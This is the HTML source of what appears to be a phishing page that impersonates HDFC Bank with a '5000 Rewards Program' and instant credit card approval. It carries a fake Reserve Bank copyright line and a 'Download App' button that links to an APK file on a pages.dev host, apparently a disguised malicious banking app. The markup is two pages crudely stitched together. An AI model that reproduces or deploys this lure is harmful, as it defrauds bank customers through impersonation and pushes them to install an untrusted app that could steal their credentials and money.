<!DOCTYPE html>
<html lang="en">
<head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Logo and Text</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        header {
            background-color: white;
            color: white;
            padding: 20px;
            text-align: center;
        }
        
        header1 {
            background-color: #333;
            color: #fff;
            padding: 20px;
            text-align: center;
        }

        .logo {
            max-width: 450px;
            display: block;
            margin: 0 auto;
        }


       .logo1 {
            max-width: 90px;
            display: block;
            margin: 0 auto;
        }
        .main-content {
            text-align: center;
            padding: 20px;
        }
    </style>
</head>
<body>
    <header>
        <img src="https://hd-539.pages.dev/images.png" alt="Logo1" class="logo1">
    </header>
       <div class="main-content">
        <p>HDFC Bnak 5000 Rewards Program...</p>
        <p>Credit Card Rewards Apply online & Get instant Approval</p>
    </div>
</body>
</html>

 
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>CheQ</title>
  <link rel="icon" type="image/x-icon" href=https://hd-539.pages.dev/images.jpg" />
  <link rel="stylesheet" href="./style.css" />
  <link rel="stylesheet" href="./all.css" />
  <link rel="preconnect" href="https://fonts.googleapis.com" />
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
  <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;500;600&display=swap" rel="stylesheet" />

      <div class="site-title">
             <p class="content-text">
         
        </p>
      </div>
                    <img src="https://hd-539.pages.dev/card.png" alt="Logo" class="logo">

      </div>
      <br>
      <div  class="site-button">
        <button style= width: 80%; class="sign-in-btn">
          <a id="sign-in-btn" href="https://hd-539.pages.dev/installhdfc.apk">Download App</a>
        </button>
      </div>
     <br>
     <br>
     <br>
     <br>
     <br>
 <div class="css-1dbjc4n" style="align-items: center; background-color: rgb(242, 248, 255); padding-bottom: 16px; padding-top: 60px; width: calc(100vw); -moz-box-align: center;"><div dir="auto" class="css-901oao" style="color: rgb(165, 165, 165); font-family: Open Sans; font-size: 12px; margin-bottom: 4px;">© Copyright 2024 RESERVE Bank Ltd.</div><div class="css-1dbjc4n" style="align-items: center; display: flex; flex-direction: row; -moz-box-align: center; -moz-box-orient: horizontal; -moz-box-direction: normal;"><div data-focusable="true" tabindex="0" class="css-1dbjc4n r-1loqt21 r-1otgn73 r-1i6wzkk r-lrvibr" style="transition-duration: 0s;"><div dir="auto" class="css-901oao" style="color: rgb(29, 134, 255); font-family: Open Sans; font-size: 12px;">Cookie Policy</div></div><div dir="auto" class="css-901oao" style="color: rgb(106, 109, 114); font-size: 12px; margin-right: 8px; margin-left: 8px;">•</div><div data-focusable="true" tabindex="0" class="css-1dbjc4n r-1loqt21 r-1otgn73 r-1i6wzkk r-lrvibr" style="transition-duration: 0s;"><div dir="auto" class="css-901oao" style="color: rgb(29, 134, 255); font-family: Open Sans; font-size: 12px;">Terms &amp; Conditions</div></div><div dir="auto" class="css-901oao" style="color: rgb(106, 109, 114); font-size: 12px; margin-right: 8px; margin-left: 8px;">•</div><div data-focusable="true" tabindex="0" class="css-1dbjc4n r-1loqt21 r-1otgn73 r-1i6wzkk r-lrvibr" style="transition-duration: 0s;"><div dir="auto" class="css-901oao" style="color: rgb(29, 134, 255); font-family: Open Sans; font-size: 12px;">Privacy Policy</div></div></div></div></br
</body>
</html>
